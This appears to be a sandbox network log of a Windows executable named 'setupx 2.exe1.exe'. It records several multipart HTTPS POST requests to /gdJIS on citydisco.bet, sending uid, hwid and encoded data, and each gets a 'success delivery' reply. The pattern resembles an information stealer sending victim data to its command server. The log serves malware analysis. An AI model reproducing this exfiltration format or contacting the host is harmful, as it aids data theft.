2025-03-13 12:33:33 UTC	593	IN	Data Raw: 75 5e 89 fc 30 3b c1 0e f2 c9 a0 66 a1 5d bb dd a1 69 91 71 d1 8a df 3d 2f fc af 0f bc c5 d3 39 69 ae 36 77 70 35 51 82 a1 43 4e a6 94 64 14 84 ba b4 cc a8 88 b9 95 56 b3 a5 b7 ae cb d8 55 19 53 a9 51 b0 78 6d cc 60 f4 2b f2 c2 fd 6f 95 11 cc 64 a7 ea 25 e4 98 3f 61 2f 4d 88 21 18 06 6f f7 a4 61 5c b9 29 3b d6 b6 90 44 9c b6 3a af 1e 61 44 05 df a3 b4 d5 75 e8 e4 b4 6f ab 98 3d 65 ca 4c 28 64 63 6f e2 18 7f f8 57 b0 cc e9 e2 29 8c 0e 88 5c aa 38 2c 49 61 c5 94 98 11 95 59 2c d5 8e 4f 4e 8c 4b 06 ff 82 be fd d4 6a 60 f5 d6 dc a5 59 4d ef f8 e2 c4 69 b9 b6 ca 8a dc 3e 2d 4b 6d f6 ac 30 1f d1 81 ff f0 6a ce b0 e2 e8 e4 65 b1 8c 59 2c bd 46 e8 f2 70 9c 28 c2 38 79 7e ac 54 dc d0 2d 46 77 8c 33 ac 3b 5c c3 e2 c6 dc 24 e8 3d 7d 85 d6 08 51 b0 8b 36 b9 1b af b5 Data Ascii: u^0;f]iq=/9i6wp5QCNdVUSQxm`+od%?a/M!oa\);D:aDuo=eL(dcoW)\8,IaY,ONKj`YMi>-Km0jeY,Fp(8y~T-Fw3;\$=}Q6
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: 1b 60 96 e9 ca cf e3 7e 27 fc a0 ea 91 ea 99 54 ec 86 2d b0 15 d8 c0 d4 16 04 67 51 7b 9c 1d 4d 08 df 6c 34 22 dc 3e 78 bc 65 19 a5 0f ab d5 88 4e ca 65 36 0a 77 f3 e3 64 1f bf 80 e0 5f d7 9d 43 91 53 c4 b3 24 ba ba b6 a0 35 ac 11 58 52 90 55 30 5e 20 b8 0d f4 05 f3 25 79 4f 6c f2 be 3f f1 51 2f a6 ef 51 8e 48 f6 60 18 43 8e d8 7c 2c da 8f f5 dc 2a ec 56 17 a6 29 3c 62 98 f8 3a 24 df 7b dd 5e 1d d3 14 53 1c 93 52 a2 34 e5 71 a1 54 50 b1 b5 30 ea c7 6f b0 35 d7 92 1c 5e 5a 45 a6 80 95 38 1d 18 d0 4d 00 11 cb db 7a 48 40 cd 31 e5 c8 7c 4c 61 67 22 84 45 f9 89 c8 9c 9f 71 8f 14 93 19 ba ea 9c 1d 09 0f 0a aa f6 ea 98 2e 68 f6 57 e0 57 ee e4 91 44 40 4f b1 48 bb 59 1a 5e 51 a7 41 76 8b 98 a9 6c 2d 22 2e a9 3d 42 d1 54 11 72 51 1b 47 53 08 97 4b 29 fe e3 1b a2 Data Ascii: `~'T-gQ{Ml4">xeNe6wd_CS$5XRU0^ %yOl?Q/QH`C\|,*V)<b:${^SR4qTP0o5^ZE8MzH@1\|Lag"Eq.hWWD@OHY^QAvl-".=BTrQGSK)
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: 49 a3 23 ec e3 ef d1 c3 b5 34 e3 64 4d f8 ac 96 5c 8d 88 0e a6 f0 a8 17 9c a2 94 62 bf 9c 04 e3 90 8b b9 cd e3 cc a7 8d 97 cd b3 15 e2 29 66 a2 ae 1b 5e d3 f5 3a 46 a4 a9 f2 43 87 66 21 15 8a f1 d6 d0 81 1f 63 f8 dc 5b eb 33 84 6c 42 19 b6 cd b3 49 fb 23 13 d6 5a 68 50 7c e3 db 16 bf 0c da 48 9a fc 35 ff b0 29 18 14 6e d8 f8 e1 da 1b a0 7b f8 f6 69 17 b8 fb aa 37 1b 0b d6 44 54 9f cd 4a c5 88 c5 1e 6b 7f 22 53 ab ba fa 6f 2d c4 60 d3 d2 18 76 77 bf cc eb ae 8b 87 78 87 62 a7 29 be 13 0f 81 7c ab fb 06 6e 32 6a cd ad a5 de dd fa 9d 16 72 a8 a1 65 a3 93 61 de e3 e2 f8 2b f9 0d 35 ef c9 ae 88 cc 1f dd a7 54 02 f9 3a 37 92 c8 11 9a 03 b6 60 0c 7e 12 6b d5 1e 42 e3 a8 d4 3e 53 a1 4d 70 c1 80 5c 74 d3 ec ee 17 9d 76 a4 bc d4 b6 f2 b5 08 3e 45 cd df d0 51 ea bc Data Ascii: I#4dM\b)f^:FCf!c[3lBI#ZhP\|H5)n{i7DTJk"So-`vwxb)\|n2jrea+5T:7`~kB>SMp\tv>EQ
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: fd 6c 67 b3 56 54 db 80 c6 bb 97 b4 27 66 67 eb 07 05 e2 41 9b 95 63 4e 9e b5 cf dd 55 3d 2b 98 21 61 a0 bc ec 64 b6 b3 5d ba b0 5d f2 c7 7f 74 64 a7 08 2a d4 73 19 d9 a3 cd 8d 11 6e b1 ab 74 33 ad ad c8 02 a0 74 5d dd cc 02 5f 0a 75 05 32 f3 43 8f 62 8b 27 64 43 82 c4 2f 9a 45 14 33 37 dc d5 7b fc 86 cf 01 1b 59 5a 1a 9e 5f 20 db 9e 3b 0a 7a 96 da 53 35 d8 95 c0 1c 32 d3 1d 84 ea 18 f7 53 c5 cb 51 b6 ad 57 6b 2f 62 02 80 0f df 82 ba fd 2f 3a e1 d7 e8 b3 4f d1 48 c3 70 9f 66 4b 13 c3 81 43 dd ae 5a e4 b5 05 28 a3 05 36 b1 3d 0d c2 e5 55 53 c4 33 0c 26 6b 13 1b 05 10 d8 89 11 7f 7e bf 0c 67 63 70 a2 84 5a 9b 97 00 a9 13 8d 0b 72 f5 a5 ca 57 b1 2c e5 b6 08 ae 95 fe 09 29 c1 0f 51 74 c8 96 8f 62 7d 55 a4 e7 bd c0 00 5b fb 32 50 ea 7d 16 78 b1 4e 23 83 c2 8c Data Ascii: lgVT'fgAcNU=+!ad]]td*snt3t]_u2Cb'dC/E37{YZ_ ;zS52SQWk/b/:OHpfKCZ(6=US3&k~gcpZrW,)Qtb}U[2P}xN#
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: a3 eb bc d7 9b 03 cf 99 52 fe 29 e2 2b 44 05 7a c8 a3 6d d6 f9 15 1e c7 e5 36 21 86 a0 83 ee b6 fe 4a 94 b4 6d 2d cd 25 fd 75 2b 7a 37 4f c9 68 d6 30 ea 2d dc c6 b4 17 10 30 f8 12 bb 74 4c b2 cd f9 4c 21 c2 bd fe 39 7d 19 fc 11 97 7d c3 14 3d 00 f6 ab 34 06 b0 1b 64 3f 63 b7 aa cb 23 56 b0 f0 b1 b1 0e 9d ee c3 39 07 c9 49 2a 3f a4 7e d7 6b ee 0f 16 74 6a 41 fd e1 1a b0 b0 d8 b5 f7 4f 7d 0b 15 0e dc 9b f1 ef 1d df 34 66 23 37 7a 1c 85 15 ba 95 0b 24 5a 4f fb a3 ed 4f c0 3e 7f 88 62 17 19 1f da 7a f4 8d 15 5e 69 39 ba 0e db 4c a8 98 f2 25 55 2f 37 9f b9 59 4c 49 3f 31 3d 0e a4 18 02 42 90 3e 7c b6 3d e7 35 0a 83 26 4b 69 08 a1 5e 71 4a dc 6e c8 d5 5d ec ba cb 53 64 a3 9b fa e9 7e de 14 32 02 f6 e1 67 4c d3 18 9c 6a ad eb a5 9e c0 e4 cd b8 28 d5 97 64 43 42 Data Ascii: R)+Dzm6!Jm-%u+z7Oh0-0tLL!9}}=4d?c#V9I*?~ktjAO}4f#7z$ZOO>bz^i9L%U/7YLI?1=B>\|=5&Ki^qJn]Sd~2gLj(dCB
2025-03-13 12:33:33 UTC	754	IN	Data Raw: e2 db 18 6c c9 85 1d 65 ed 00 0c 0f 2f 27 18 70 e5 40 19 e2 22 f8 d7 75 77 91 3c e9 6b c3 92 7e a3 8b 92 11 cb 0a 35 1e 1b 81 2d 28 1d 03 f5 24 8c 48 f7 c5 1e 84 08 2e dd 78 9d 13 e0 0d 99 e6 96 fa 07 d0 e3 24 d9 9d 0b ec 26 59 64 e5 fd c0 76 ce 6b 4d de 1b 2b ff b1 76 4d 9b a9 2c 69 02 7b d6 5d 38 6a 85 58 b5 a3 67 cd 27 0f 3f b4 7d 47 7b 98 1c 49 71 3e 96 1d 93 d5 04 3b 98 ff 5a 86 7a 03 15 d9 9b 49 12 4c b4 bf 03 f4 b5 c2 b2 3d 79 7e 5a 51 49 35 3d aa 08 37 60 9e 5f 9c 99 7b 24 62 1f 3b 18 94 de 2e ed 2c 31 87 ce 6c ed 38 34 bc 85 53 02 0c 3b eb 5b 43 09 3d 04 bf e6 c8 da 5f 00 bb 38 1a fc 19 bf 88 07 d4 53 3d 40 a3 bb 6c c0 c4 31 57 e4 59 7a 00 e8 62 27 63 bb 93 30 34 5d b9 c1 3a e7 04 1a c5 53 37 70 8d 86 72 e4 fe ec a0 eb 23 bc 4f b8 fc 25 c5 13 7a Data Ascii: le/'p@"uw<k~5-($H.x$&YdvkM+vM,i{]8jXg'?}G{Iq>;ZzIL=y~ZQI5=7`_{$b;.,1l84S;[C=_8S=@l1WYzb'c04]:S7pr#O%z
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: 3e c9 31 f6 c4 04 0a 6a 68 be 11 bf 56 41 15 e6 19 1b 6f 9c 84 83 71 be 4a e8 21 f6 a1 b7 a3 10 ab 91 a2 2f d8 3e ba 1e fe e4 c4 21 1c cc ec 7e 25 d9 5e ab b5 c2 f1 0c 45 5b 0c 66 fc 60 fa b1 14 7f 77 64 c0 fa a2 19 2e 1c 20 51 9e e8 6e 2a 49 97 7b b1 02 f5 0f e0 48 be b9 eb 05 d5 07 56 fe f7 e3 48 3c e5 fc 8a 58 9b 43 52 b1 c5 88 1e a9 62 f3 c9 aa a7 5e fb bc 6a 7b ff 37 25 a6 c2 a3 34 4d ab 33 26 44 67 e2 34 11 c7 c6 80 51 52 d3 09 1c f2 54 25 cb 01 52 b9 c9 9d e9 f9 7b 52 38 62 91 14 5b 91 e9 b3 73 4b 5d 95 5a 2b 7f ad 5c a5 05 31 cf 23 0d d6 80 c2 6e 41 ba cf 86 61 eb 65 6b 7e 73 29 f6 5d ea 62 c0 67 9e 13 02 06 e1 98 91 a8 50 3a f5 08 63 b4 dc 70 61 a9 3b e0 94 9a 4d 0a db cd ce f4 e6 84 42 5d a1 9c f9 8d 28 26 15 d9 7d 0e 78 a8 f4 73 b7 a1 8d 8e c0 Data Ascii: >1jhVAoqJ!/>!~%^E[f`wd. Qn*I{HVH<XCRb^j{7%4M3&Dg4QRT%R{R8b[sK]Z+\1#nAaek~s)]bgP:cpa;MB](&}xs
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: 69 85 de 64 30 66 ec d4 72 e5 97 79 22 19 94 33 78 30 70 af 3c 1a 64 e6 f6 36 c5 91 b1 e7 bc 5b 33 0a 97 3b 18 98 ea 49 a7 90 ad 7d f0 a2 63 62 da 8e 18 bd 60 a5 3e e7 c3 f9 a1 d5 65 a7 b6 72 7c ca e3 0c 21 bb 41 ea df f5 bc be 32 70 9d 74 57 14 ce c4 04 54 b4 4c a4 05 d3 52 b4 17 8a d2 ce 04 a1 ac cb 17 b3 6e dd ce 01 92 0a 66 e7 bb 60 22 e8 6a 83 23 f0 eb aa ae d1 7f 66 cd 43 e5 88 76 a7 41 37 77 ca 94 e1 36 b3 ed 88 a9 13 7b 68 a4 4b 3b de 4d 16 65 b6 f5 e3 4b f5 35 88 56 51 b4 af 2e 43 fb e9 13 96 33 d0 d6 29 da ff 79 a2 5a 7b 8b f6 e4 a3 9f 5f 4e 8e de 1b af af 79 38 1b fe 67 a4 ba c6 dc ee e1 e3 b0 cd af a7 5c 84 fe 88 2c 23 e6 09 86 a3 9d fd c4 55 fd e7 bb be d5 f5 ee e3 71 ad 4a 19 5c 31 76 d9 68 0a b7 d4 6f 0d 49 29 d9 48 ae f0 6d 09 43 0e 68 f1 Data Ascii: id0fry"3x0p<d6[3;I}cb`>er\|!A2ptWTLRnf`"j#fCvA7w6{hK;MeK5VQ.C3)yZ{_Ny8g\,#UqJ\1vhoI)HmCh
2025-03-13 12:33:33 UTC	1369	IN	Data Raw: 54 b8 07 ed ae 79 5e 71 ac d0 6d 3a 67 4e bf d3 6d e1 f7 04 ed 08 7d f5 37 fc c0 0d 26 40 4d 4f 5a 69 19 7a 87 52 5e 4b bb e9 e1 ff f9 75 bd cd cf 23 fd ee 2e d0 6c 1e e3 7c 33 2f 89 77 55 a6 d2 d5 ee c6 62 8a 63 fc 5b d1 85 b0 72 aa 44 44 1d 26 9b 3a cf 78 20 39 96 1e 8c d8 bb 12 46 39 ca 4d 88 ee bf 59 6b 19 16 93 bf ae 27 f6 37 0c 47 89 2d d2 b8 f7 59 bd 9c 91 1b 17 be 15 ae 16 f4 56 4c 2e 09 14 77 ab 0c 83 d8 c2 bd 23 51 0c 86 f0 75 5f 0d 9c 97 28 41 f3 11 a9 50 61 a5 42 53 c3 fa cd e5 81 bb 5f b3 2f 95 ba f0 49 3a 7f ac ce c4 d4 3f b1 b1 eb bc c3 35 bf 40 8c fb 7a 49 9b 7e 2e fe c5 83 c3 1f 5c e5 f3 d9 1e 69 fe 93 ad ad 6f 47 63 be a3 19 9f 99 ec 0d b8 9e f6 2e 37 4d b5 1a 3d ce 3a bb db fa 6d b5 cf 1a e3 bb 1f bf 5a d4 21 c4 4c 9f 22 82 5e b5 fb 9b Data Ascii: Ty^qm:gNm}7&@MOZizR^Ku#.l\|3/wUbc[rDD&:x 9F9MYk'7G-YVL.w#Qu_(APaBS_/I:?5@zI~.\ioGc.7M=:mZ!L"^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49683	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:35 UTC	280	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Z0C9g0vMumphw6S5y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14513 Host: citydisco.bet
2025-03-13 12:33:35 UTC	14513	OUT	Data Raw: 2d 2d 5a 30 43 39 67 30 76 4d 75 6d 70 68 77 36 53 35 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 0d 0a 2d 2d 5a 30 43 39 67 30 76 4d 75 6d 70 68 77 36 53 35 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 30 43 39 67 30 76 4d 75 6d 70 68 77 36 53 35 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 Data Ascii: --Z0C9g0vMumphw6S5yContent-Disposition: form-data; name="uid"a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac--Z0C9g0vMumphw6S5yContent-Disposition: form-data; name="pid"2--Z0C9g0vMumphw6S5yContent-Disposition: form-data; name="hwid"
2025-03-13 12:33:35 UTC	811	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=991I549eGtIhQpXTTedHtqRcL96MXIekKEtIyRsQZI1Oe9x7o1V8myyOpNYGrul%2FE1DegWD%2BzJcd%2FSyaKjAM0QFiZY50WT6kUyGV7Kx3ZUMfxJzcNhcOnmVyME2ftgZ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f839947eaed-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13880&min_rtt=13612&rtt_var=4067&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15451&delivery_rate=212659&cwnd=251&unsent_bytes=0&cid=9b5ce44044ab2ffa&ts=1062&x=0"
2025-03-13 12:33:35 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49685	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:37 UTC	278	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=nz73w5KkTES5g8r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15065 Host: citydisco.bet
2025-03-13 12:33:37 UTC	15065	OUT	Data Raw: 2d 2d 6e 7a 37 33 77 35 4b 6b 54 45 53 35 67 38 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 0d 0a 2d 2d 6e 7a 37 33 77 35 4b 6b 54 45 53 35 67 38 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 6e 7a 37 33 77 35 4b 6b 54 45 53 35 67 38 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 Data Ascii: --nz73w5KkTES5g8rContent-Disposition: form-data; name="uid"a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac--nz73w5KkTES5g8rContent-Disposition: form-data; name="pid"2--nz73w5KkTES5g8rContent-Disposition: form-data; name="hwid"F8
2025-03-13 12:33:38 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zztZEJ2%2BAiQlPqOGR4nxhBvl0NGn9rGEBaj0kQbTpwQxgaZTulQQEWV2cF9uO4DXguxd%2Bp8ZqsV%2FUu6Jqdb0K7TaIMJVN74LO9jROWdJorzdCrzyWB%2B243LYzUE3vfTB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f918ff2b46b-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14559&min_rtt=13408&rtt_var=4801&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=16001&delivery_rate=215861&cwnd=240&unsent_bytes=0&cid=cfab6653f718f9ce&ts=846&x=0"
2025-03-13 12:33:38 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49689	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:39 UTC	277	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=bXvL6tabwYEq5Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20385 Host: citydisco.bet
2025-03-13 12:33:39 UTC	15331	OUT	Data Raw: 2d 2d 62 58 76 4c 36 74 61 62 77 59 45 71 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 0d 0a 2d 2d 62 58 76 4c 36 74 61 62 77 59 45 71 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 58 76 4c 36 74 61 62 77 59 45 71 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 35 42 37 Data Ascii: --bXvL6tabwYEq5QContent-Disposition: form-data; name="uid"a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac--bXvL6tabwYEq5QContent-Disposition: form-data; name="pid"3--bXvL6tabwYEq5QContent-Disposition: form-data; name="hwid"F85B7
2025-03-13 12:33:39 UTC	5054	OUT	Data Raw: cb c6 61 8b ee d9 34 f2 32 ef 48 2c e3 13 75 1e 4c 0b 6d 00 b9 2c fe 80 77 20 25 6a d9 fb e7 3f 72 d3 b8 88 15 5d 29 dd 18 ea 48 3e 71 0e 3e 80 93 20 30 17 60 bc 1b 15 f5 38 f7 10 cb de 0e d5 e4 cf d8 27 5b d8 90 f5 62 54 3e 8f dd d8 09 92 1b 9f 3d 71 f2 8c 09 f7 6e f6 d7 15 88 01 17 c6 d6 bb a3 5a ff 04 22 41 5c 1c fe 0e a2 f6 36 4a ae ee 5a 39 8f 36 5a 1c 74 60 f0 f0 8f 8d 84 f5 01 a6 c9 56 94 5e 18 95 d0 78 f4 34 60 a5 91 47 48 86 a1 85 8e 6c 1b d4 db 85 c5 69 ec a8 d7 c2 c3 96 73 13 fc 0d c4 13 e8 06 c6 0d 1a 7e e6 49 f2 20 a7 b0 30 8e ca e3 b2 fe bb 11 c5 9f 70 94 ee 35 d4 a1 48 93 f0 a5 4e b5 be 59 76 74 55 19 b9 d6 23 ed cc 0c e8 18 85 50 2b 81 1e d8 f3 6a dc 43 4f 74 4f c8 ff 67 a0 2e f2 6f 06 d0 a2 7d 28 bf 81 0b ea 8c c7 6c 43 01 1c 3f 15 8e f5 Data Ascii: a42H,uLm,w %j?r])H>q> 0`8'[bT>=qnZ"A\6JZ96Zt`V^x4`GHlis~I 0p5HNYvtU#P+jCOtOg.o}(lC?
2025-03-13 12:33:40 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fwEiT1WdlYDPhSTPJ%2FJ6b0kVD4sHIXxSbhFE4AoLbFPuoysY4ByNwRGX1yeaUo0Vz0d1XuN1nBT5NNanU4lqTmR2Aaz83L8UO0s3%2BYM9ws3h%2FgUE9NM5KlBdyWBCgtn9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8fa068ee0ed2-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13986&min_rtt=13710&rtt_var=4101&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21342&delivery_rate=200442&cwnd=231&unsent_bytes=0&cid=02f46304416dbe06&ts=991&x=0"
2025-03-13 12:33:40 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49690	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:42 UTC	275	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=iTN6Qmj74616B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2489 Host: citydisco.bet
2025-03-13 12:33:42 UTC	2489	OUT	Data Raw: 2d 2d 69 54 4e 36 51 6d 6a 37 34 36 31 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 0d 0a 2d 2d 69 54 4e 36 51 6d 6a 37 34 36 31 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 69 54 4e 36 51 6d 6a 37 34 36 31 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 35 42 37 39 33 34 Data Ascii: --iTN6Qmj74616BContent-Disposition: form-data; name="uid"a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac--iTN6Qmj74616BContent-Disposition: form-data; name="pid"1--iTN6Qmj74616BContent-Disposition: form-data; name="hwid"F85B7934
2025-03-13 12:33:42 UTC	807	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHi3t1iSYtyqxNl7P0gzyzIkh8D1sjfaL%2BGJKtAgv4Xt3BqH%2Fep89LTIWd5zXr1vaqbLcAB5VTGAqP8ks6PTYj8v%2FK0WSqM6T9xzE63rv6YnQfuZlXEwQFJ4tegYB7H1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8faf8d35acb2-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13650&min_rtt=12385&rtt_var=4265&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2831&recv_bytes=3400&delivery_rate=204736&cwnd=231&unsent_bytes=0&cid=884440c81a53f5dc&ts=798&x=0"
2025-03-13 12:33:42 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49691	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
